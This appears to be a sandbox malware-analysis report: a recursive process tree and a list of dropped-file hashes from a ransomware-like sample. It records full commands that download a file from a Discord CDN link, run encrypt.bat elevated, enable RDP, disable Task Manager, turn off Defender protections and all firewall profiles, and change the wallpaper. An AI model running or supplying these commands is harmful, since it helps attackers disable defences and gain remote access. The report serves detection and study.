C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"72⤵
- Blocklisted process makes network request
PID:4532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"72⤵PID:132
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"73⤵PID:3412
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"74⤵PID:4204
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f74⤵PID:2748
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"74⤵PID:2236
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f74⤵PID:2328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"74⤵PID:2108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"74⤵PID:2132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"74⤵PID:3576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"74⤵PID:1188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"74⤵PID:1180
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable74⤵PID:1444
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE74⤵PID:3932
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off74⤵PID:3788
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off74⤵PID:2340
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off74⤵PID:2744
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off74⤵PID:1028
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off74⤵PID:676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"74⤵PID:432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"74⤵PID:4556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"74⤵PID:1932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"74⤵PID:4056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"74⤵PID:3952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"74⤵PID:1860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"74⤵
- Blocklisted process makes network request
PID:3576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"74⤵PID:2364
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"75⤵PID:1092
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"76⤵PID:3164
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f76⤵PID:2012
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"76⤵PID:1196
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f76⤵PID:5032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"76⤵PID:2604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"76⤵
- Command and Scripting Interpreter: PowerShell
PID:2668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"76⤵PID:240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"76⤵PID:1064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"76⤵PID:4568
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable76⤵
- Modifies Windows Firewall
PID:3008
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE76⤵PID:2688
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off76⤵PID:2452
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off76⤵PID:3404
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off76⤵PID:2720
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off76⤵PID:3556
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off76⤵PID:1112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"76⤵PID:4524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"76⤵PID:884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"76⤵PID:2292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"76⤵PID:3036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"76⤵
- Command and Scripting Interpreter: PowerShell
PID:2604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"76⤵
- Command and Scripting Interpreter: PowerShell
PID:2668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"76⤵
- Blocklisted process makes network request
PID:240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"76⤵
- Modifies registry class
PID:408 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"77⤵PID:2600
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"78⤵PID:2688
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f78⤵PID:4676
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f76⤵PID:3472
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters76⤵PID:956
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f74⤵
- Sets desktop wallpaper using registry
PID:3484
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters74⤵PID:5100
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f72⤵
- Sets desktop wallpaper using registry
PID:2344
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters72⤵PID:3768
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f70⤵PID:2288
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters70⤵PID:1208
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f68⤵
- Sets desktop wallpaper using registry
PID:4244
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters68⤵PID:2040
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f66⤵PID:956
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters66⤵PID:4116
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f64⤵
- Sets desktop wallpaper using registry
PID:1908
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters64⤵PID:4092
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f62⤵PID:888
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters62⤵PID:484
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f60⤵PID:3788
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters60⤵PID:1448
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f58⤵
- Sets desktop wallpaper using registry
PID:3932
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters58⤵PID:3264
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f56⤵
- Sets desktop wallpaper using registry
PID:2912
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters56⤵PID:1920
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f54⤵PID:2808
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters54⤵PID:1664
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f52⤵
- Sets desktop wallpaper using registry
PID:2712
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters52⤵PID:1084
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f50⤵PID:4800
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters50⤵PID:2808
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f48⤵PID:2348
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters48⤵PID:2788
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f46⤵
- Sets desktop wallpaper using registry
PID:4204
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters46⤵PID:4428
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f44⤵PID:2956
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters44⤵PID:3404
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f42⤵PID:3472
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters42⤵PID:4720
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f40⤵PID:1196
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters40⤵PID:1376
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f38⤵
- Sets desktop wallpaper using registry
PID:4756
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters38⤵PID:2680
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f36⤵
- Sets desktop wallpaper using registry
PID:3564
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters36⤵PID:3164
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f34⤵PID:2320
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters34⤵PID:4588
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f32⤵PID:4904
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters32⤵PID:396
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f30⤵
- Sets desktop wallpaper using registry
PID:3164
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters30⤵PID:4720
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f28⤵
- Sets desktop wallpaper using registry
PID:3620
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters28⤵PID:4748
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f26⤵
- Sets desktop wallpaper using registry
PID:1188
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters26⤵PID:2060
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f24⤵PID:3928
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters24⤵PID:4796
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f22⤵
- Sets desktop wallpaper using registry
PID:2744
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters22⤵PID:1476
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f20⤵
- Sets desktop wallpaper using registry
PID:3556
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters20⤵PID:2320
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f18⤵
- Sets desktop wallpaper using registry
PID:1552
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters18⤵PID:2712
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f16⤵PID:3568
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters16⤵PID:2876
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f14⤵
- Sets desktop wallpaper using registry
PID:3172
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters14⤵PID:740
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f12⤵PID:3520
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters12⤵PID:4288
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f10⤵PID:1116
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters10⤵PID:3852
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f8⤵
- Sets desktop wallpaper using registry
PID:4988
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters8⤵PID:1156
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f6⤵
- Sets desktop wallpaper using registry
PID:1632
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters6⤵PID:4792
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f4⤵PID:1216
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:4844
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1376
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3976
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD57a2773f461b2f4672ceb202de1104e08
SHA1cbcab3b011eddb0b5af6dcfee171511efc2bb9c3
SHA256522df7962a78dcec153baa5039c7cc119a0893fa247483fa0cddaf600ef9f695
SHA512df35de150f08cb8bba1910a6be86d7945cd44850b6e9e9ffd420643d1ad18b172325f9114aa0982ec9e148ba62b55b4d8c69236156c562a5a1c024fba0c3983b
-
Filesize
1KB
MD560722a327960e4b4f5d967101a72ed06
SHA104109aaa12c19c7cb4c062b34d4ab4bfe4f52c5e
SHA2563441d2b980fc2b4504c2308e6ec5da713c6bb0afd0ca9c846eec198cd1e2edfd
SHA51298812a8546200353ae3c81733963082cbc6f2041b21d3897a5f26b63fbb0b730d81ab438286bdbdaef9eac8bfe3fe81fddabef2c0fd5f000a4279828bfdad896
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
152B
MD5704d4cabea796e63d81497ab24b05379
SHA1b4d01216a6985559bd4b6d193ed1ec0f93b15ff8
SHA2563db2f8ac0fb3889fcf383209199e35ac8380cf1b78714fc5900df247ba324d26
SHA5120f4803b7b7396a29d43d40f971701fd1af12d82f559dcfd25e0ca9cc8868a182acba7b28987142c1f003efd7dd22e474ac4c8f01fe73725b3618a7bf3e77801d
-
Filesize
152B
MD5de47c3995ae35661b0c60c1f1d30f0ab
SHA16634569b803dc681dc068de3a3794053fa68c0ca
SHA2564d063bb78bd4fa86cee3d393dd31a08cab05e3539d31ca9f0a294df754cd00c7
SHA512852a9580564fd4c53a9982ddf36a5679dbdce55d445b979001b4d97d60a9a688e532821403322c88acc42f6b7fa9cc5e964a79cbe142a96cbe0f5612fe1d61cb
-
Filesize
5KB
MD5aed2dca6e7d2058d2ffbb0a75faf4613
SHA184bb5bf66a467a1b5b1663b2e6c0a71702fdb128
SHA256361cf8e5a9e1d239de990d3baa395cc2290d6b9d8c44540c032da6bcbf4676e4
SHA51249e5ae6ae23c7b2b183a715367b1a11117052946354c5a201a73005bad3bdcd180ef4e0ab50a89180616e55aec4890ff781af0a26b540b5b87820cf0fe850152
-
Filesize
5KB
MD520b8c9f3a869e5a370af8138c79acd6e
SHA17e728f11412821e888162ddc17310cfd99994244
SHA25608179669e90eb516b479f93c180800af9d473ae4696c66ebad9b951dc4d55479
SHA51239fbb552f3575dc452970ca178233cbc9757d8ddd2683b1651ae8a3b89b6b50bddba88c4f7c261689ce4d17ba2ccef214980539510e1a9f8e5df2de00751a604
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\e492a295-8388-4902-8db8-3734d233df2a.tmp
Filesize5KB
MD5aacec29acabacafb1138cef435e25deb
SHA1628af8a76987a840fbe8903142b3034c6fdb5022
SHA256202e7f0052ea7bdf86f31f1dbc4e95224c31b037938cf6dcbbdaccb550149617
SHA51293a729b00f8fa335be08b0497b0fc854cee39f4bbdd67aeb5b681c8574e4ed556e2b4a6fffb409667456325b2732f7afdffb1f013de1f74f2331501a80d3dee0
-
Filesize
11KB
MD5ecaa47fe5ed4afab614b09ba4d31579e
SHA1f68b58cf15b05b6f5695e40ba909be55086bf1be
SHA2563aa63bc0772856a7c161365f539f6c2de4d0c8389e9e4ee9cd5f62ef37f52a01
SHA5125b027c28368681075924b7b91eaf705ef65142d52bd3977c9c31c8be6778b3b6e9e6a72ecb5bc8df522f3d5fba5c2cc108562c36184f103ff555c57d3ce56268
-
Filesize
11KB
MD590ebeabd493dd84c50f830eac13bb5eb
SHA19c2a465ab23a7a6527b129d7cd32e9ff0a8c8aeb
SHA256dc6a90cd03aeaf42f7e2002fcfb2926eeddc0dcfcce7a71863f8a90b2329b305
SHA51212c546bb8490335443f009c40b004655acf02410060f679efbb19aa1a9e0f359fbf96aa4fa0f19b778dc8741a6d57398b91e6f632631e3a539779fb14aaf6673
-
Filesize
944B
MD5906523560f8af295fe0b398799658002
SHA1b6b3d1f077ae0c39ac71d138630744856c0e424d
SHA2569f1750afbd8fd87ce27d8ecb32a9dfc9247ca360055a34fb25780c3685995ced
SHA5124dacd67d05b3648ce9ec59833aeca1c4683e25a8c0ab13297bede5168487e3c9a0608b9c93bb4e3baa2bd3a5414672f62c55b7386813d814e2cb44cd926f566b
-
Filesize
944B
MD5cc2210f652fff7eb769ceac982678f09
SHA1dc1eebc04c9fc5dbfc05b80340ada3c63e16178e
SHA2568fd1a8119831b8aec9d809642505b154c6ad3a6920a7bf7c8028e369da5978c5
SHA51238db3e814c4e67f79938574d4d7b73248c61011dca46d2c77615aa1682fddf0554f41eef2097c4149ad4dee41b53db9c654901d001fc6f674d0a7c3ef5f58303
-
Filesize
944B
MD5050567a067ffea4eb40fe2eefebdc1ee
SHA16e1fb2c7a7976e0724c532449e97722787a00fec
SHA2563952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e
SHA512341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259
-
Filesize
944B
MD59dd876d6004f9e894c7d8de6ae950e5b
SHA148f0b4c5f0203788acdeceee62a69df0022dc8d4
SHA2566e19ea46b5d0c9d58c6fc3c6187e5b821f1600cc25d675d25c8fd829f7194344
SHA5123f5be2cb27900546eb791f5d5f1274c787f9a4645647b9943a5502c2167ec8a5d9ab653f2efc088d6ea6e8057b63caf3dce0a376f0b88d62f43b68bfa1518324
-
Filesize
944B
MD5bda95964af6686f13b722b5afc511019
SHA1a61077c1cf551bfb18bd4aa58a50fd127897c8fd
SHA256fea4fcf87c1ba433a7c5a078733f65b837c20cc105c5b7125ba5f55ee65b49c7
SHA512a44e2078f2486d3805e01d2eab93f750f2035a3c3e8f2deb3946470ecf42c06c8fdaa2b04ad8d2941ed33a6cd68f0ed75b47fd1dd650129dc047daa299bced47
-
Filesize
944B
MD5947f5aa506644a452dd41f1c18ea6103
SHA1d26a04fd395c97e0028a46aaabf2a4e6767dce75
SHA25669428140330e639719076b30ff37512ccb9202ba7013c0ad7b938ac95c4aeabd
SHA5126b61b9d7936cd3e7eef324c79f021af7400c850ed3312c5c444d0a08c6476d7b7bc3730edf96fe749c0f18464c0cf3624a1f80abaf69cb564b231fdc6527d698
-
Filesize
944B
MD520605e5defd408aff02f2484a1d37a15
SHA1a49153d3c57a47b0b2abc0494d1dcad58cbe9dd0
SHA2567d79e0c7274361b45ee2eaa1838022c72f83b864288f67b9033669eb2ae04b89
SHA5129873c143675025c76afbc5e54b8b962de2500e5f52d1c96ce7a5a8a574ba2e56b8a8e11715b1950e1d8ec3f677956ef9990899ac3457b8517eaac39a41d5bc4a
-
Filesize
1KB
MD5d9734cb5b55bf5df8ff11687c32e7df6
SHA1080ee90218af5791480cb07a24888f1d840c85a6
SHA2561415cf5ca423ebccc6bad8c50c8fc990aab0499dcbf9a0ed415b13a398dd0f4d
SHA5122426314730805cd837a5ae8ef325e184663fe1a1a622870380302278b53e95eef65ca68b6c4884e6ba1c34f10f1070c89294f5f561cce7c84b7ea89c6984695b
-
Filesize
944B
MD538438a4316012154ae9ae948bfe7dd30
SHA13720f72b120583f8495c34c2d309bf1a8331783f
SHA256b44274f6006964771bfc9482e419aab5fcd54f097086215aebe6be291d883a55
